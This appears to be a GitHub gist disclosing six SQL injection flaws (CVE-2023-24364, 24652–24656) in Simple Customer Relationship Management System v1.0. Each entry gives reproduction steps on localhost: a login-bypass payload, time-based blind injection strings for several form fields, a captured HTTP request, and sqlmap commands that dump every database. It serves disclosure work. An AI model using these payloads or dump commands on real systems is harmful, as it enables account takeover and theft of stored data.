Created
February 9, 2023 14:47
-
-
Save y0gesh-verma/a9e83220f268f0294a611b82cf266739 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Simple Customer Relationship Management System v1.0 - SQL Injection Vulnerability | |
## Multiple SQL Injection Vulnerability found in Simple Customer Relationship Management System 1.0 version. | |
**Description:-** | |
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter under the Admin Panel. | |
**Step to Reproduce :-** | |
> 1. Navigate to the Admin Panel By following the URL: http://localhost/php-scrm/admin/ | |
> 2. Now insert the below-given payload in the username field and any random digits/string like "test" in the password field then click on the "Login" button to takeover the admin account. | |
> Payload: ' or 1 = 1 -- - | |
**Reference: CVE-2023-24364** | |
**Description:-** | |
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the Description parameter under the Create ticket function. | |
**Step to Reproduce :-** | |
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php | |
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php | |
> 3. Now Navigate to the Create ticket page By following the URL: http://localhost/php-scrm/create-ticket.php | |
> 4. Now fill out the Create ticket form then intercept the request in the burp suite. | |
> 5. Now send the burp suite intercepted request into the burp repeater. | |
> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc | |
> 6. Now insert the URL-encoded payload in the description parameter. | |
> | |
> subject=newticket&tasktype=Option+1&priority=important&description=newdescriptiontest'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&send=Send | |
> | |
> 7. Now click on the "send" button to send the request. | |
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection. | |
> 9. Now dump data by using sqlmap. | |
> 10. Now copy the burp intercepted request and create a file crm-create-ticket-request.txt | |
> 11. Now dump databases by sqlmap. | |
> # python sqlmap.py -r crm-create-ticket-request.txt -p description -dbs --batch | |
> 12. Now dump all data by sqlmap. | |
> # python sqlmap.py -r crm-create-ticket-request.txt -p description --dump-all --batch | |
**Reference: CVE-2023-24652** | |
**Description:-** | |
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the oldpass parameter under the Change Password function. | |
**Step to Reproduce :-** | |
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php | |
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php | |
> 3. Now Navigate to the change password page By following the URL: http://localhost/php-scrm/change-password.php | |
> 4. Now fill out the Change Password form put random digits/string like "test123" in the "Current Password" field and put random content like "123456" in "New Password" and "Confirm Password" fields then intercept the request in burp suite. | |
> 5. Now send the burp suite intercepted request into burp repeater. | |
> 6. Now insert the below-given payload in the oldpass parameter then click on the "send" button to send request. | |
> Payload: oldpass=test123'+AND+(SELECT+123+FROM+(SELECT(SLEEP(10)))abc)+AND'&newpass=123456&confirmpassword=123456&change=change | |
> 7. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection. | |
> 8. Now dump data by using sqlmap. | |
> 9. Now copy the burp intercepted request and create a file crm-request.txt | |
> | |
> POST /php-scrm/change-password.php HTTP/1.1 | |
> Host: localhost | |
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 | |
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
> Accept-Language: en-US,en;q=0.5 | |
> Accept-Encoding: gzip, deflate | |
> Content-Type: application/x-www-form-urlencoded | |
> Content-Length: 65 | |
> Origin: http://localhost | |
> Connection: close | |
> Referer: http://localhost/php-scrm/change-password.php | |
> Cookie: PHPSESSID=65c7e25jf215pltjkg8gr5kli9 | |
> Upgrade-Insecure-Requests: 1 | |
> Sec-Fetch-Dest: document | |
> Sec-Fetch-Mode: navigate | |
> Sec-Fetch-Site: same-origin | |
> Sec-Fetch-User: ?1 | |
> | |
> oldpass=test123&newpass=123456&confirmpassword=123456&change=Change | |
> | |
> 10. Now dump databases by sqlmap. | |
> # python sqlmap.py -r crm-request.txt -p oldpass -dbs --batch | |
> 11. Now dump all data by sqlmap. | |
> # python sqlmap.py -r crm-request.txt -p oldpass --dump-all --batch | |
**Reference: CVE-2023-24653** | |
**Description:-** | |
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Request a Quote function. | |
**Step to Reproduce :-** | |
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php | |
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php | |
> 3. Now Navigate to the Request a Quote page By following the URL: http://localhost/php-scrm/get-quote.php | |
> 4. Now fill out the Quote Request Form then intercept the request in the burp suite. | |
> 5. Now send the burp suite intercepted request into the burp repeater. | |
> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(5)))xyz) AND 'abc'='abc | |
> 6. Now insert the payload in the name parameter. | |
> | |
> Content-Disposition: form-data; name="name" | |
> | |
> test1' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc | |
> | |
> 7. Now click on the "send" button to send the request. | |
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection. | |
> 9. Now dump data by using sqlmap. | |
> 10. Now copy the burp intercepted request and create a file crm-quote-request.txt | |
> 11. Now dump databases by sqlmap. | |
> # python sqlmap.py -r crm-quote-request.txt -p name -dbs --batch | |
> 12. Now dump all data by sqlmap. | |
> # python sqlmap.py -r crm-quote-request.txt -p name --dump-all --batch | |
**Reference: CVE-2023-24654** | |
**Description:-** | |
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Profile Update function. | |
**Step to Reproduce :-** | |
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php | |
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php | |
> 3. Now Navigate to the profile update page By following the URL: http://localhost/php-scrm/profile.php | |
> 4. Now fill out your profile form then intercept the request in the burp suite. | |
> 5. Now send the burp suite intercepted request into the burp repeater. | |
> Payload: ' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc | |
> 6. Now insert the payload in the name parameter. | |
> | |
> Content-Disposition: form-data; name="name" | |
> | |
> user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc | |
> | |
> 7. Now click on the "send" button to send the request. | |
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection. | |
> 9. Now dump data by using sqlmap. | |
> 10. Now copy the burp intercepted request and create a file crm-profile-request.txt | |
> | |
> 11. Now dump databases by sqlmap. | |
> # python sqlmap.py -r crm-profile-request.txt -p name -dbs --batch | |
> 12. Now dump all data by sqlmap. | |
> # python sqlmap.py -r crm-profile-request.txt -p name --dump-all --batch | |
**Reference: CVE-2023-24655** | |
**Description:-** | |
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the subject parameter under the Create Ticket function. | |
**Step to Reproduce :-** | |
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php | |
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php | |
> 3. Now Navigate to the Create ticket page By following the URL: http://localhost/php-scrm/create-ticket.php | |
> 4. Now fill out the Create ticket form then intercept the request in the burp suite. | |
> 5. Now send the burp suite intercepted request into the burp repeater. | |
> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc | |
> 6. Now insert the URL-encoded payload in the subject parameter. | |
> | |
> subject=newticket'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&tasktype=Option+1&priority=important&description=newdescriptiontest&send=Send | |
> | |
> 7. Now click on the "send" button to send the request. | |
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection. | |
> 9. Now dump data by using sqlmap. | |
> 10. Now copy the burp intercepted request and create a file crm-create-ticket-request.txt | |
> 11. Now dump databases by sqlmap. | |
> # python sqlmap.py -r crm-create-ticket-request.txt -p subject -dbs --batch | |
> 12. Now dump all data by sqlmap. | |
> # python sqlmap.py -r crm-create-ticket-request.txt -p subject --dump-all --batch | |
**Reference: CVE-2023-24656** |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment